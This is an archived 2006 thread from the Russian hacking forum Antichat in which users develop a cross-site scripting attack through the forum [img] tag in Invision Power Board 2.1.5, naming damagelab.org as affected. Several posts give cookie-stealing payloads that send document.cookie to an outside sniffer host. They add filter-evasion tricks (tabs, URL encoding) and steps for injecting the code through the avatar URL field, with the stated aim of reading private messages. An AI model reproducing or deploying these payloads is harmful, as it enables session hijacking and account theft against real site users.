ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.04.2006, 17:58
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Вроде похоже на
http://forum.antichat.ru/thread15709.html
 

  #12  
Старый 11.04.2006, 23:14
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от CinerX  
тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
Не понял вместо
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???
 

  #13  
Старый 12.04.2006, 00:00
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Попробал вот это
[img]j a v a s c r i p t:document.images[1].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;.jpg[/img]

и вот что мне выдал
Sorry, dynamic pages in the [IMG] tags are not allowed

вместо знака вопроса пробавл вот это %3F затем &#x3F; и это &#63
 

  #14  
Старый 12.04.2006, 00:18
_CinerX
Новичок
Регистрация: 11.04.2006
Сообщений: 6
Провел на форуме:
38973

Репутация: 1
По умолчанию

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

Цитата:
XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???
Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

Последний раз редактировалось _CinerX; 12.04.2006 в 00:22..
 

  #15  
Старый 13.04.2006, 04:00
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Хмм.. Ну никак не удаётся протащить ? и ;
 

  #16  
Старый 13.04.2006, 08:58
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

там хэши наскоко помню соленые так что толку от xss ...
 

  #17  
Старый 13.04.2006, 17:21
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Почитать внутренние форумы и личные мессаги. Ещё поиграться.
 

  #18  
Старый 14.04.2006, 01:36
_CinerX
Новичок
Регистрация: 11.04.2006
Сообщений: 6
Провел на форуме:
38973

Репутация: 1
По умолчанию

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
Код:
[im*g]j	a	v	a	s	c	r	i	p	t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]
пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов [img] и [/img]

ПС просьба репу добавлять CinerX, а не _CinerX

Последний раз редактировалось _CinerX; 14.04.2006 в 01:39..
 

  #19  
Старый 14.04.2006, 02:56
_CinerX
Новичок
Регистрация: 11.04.2006
Сообщений: 6
Провел на форуме:
38973

Репутация: 1
По умолчанию

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX
 

  #20  
Старый 14.04.2006, 22:47
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Sorry, that is not a valid file extension

У меня не получаеться ничего (((
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ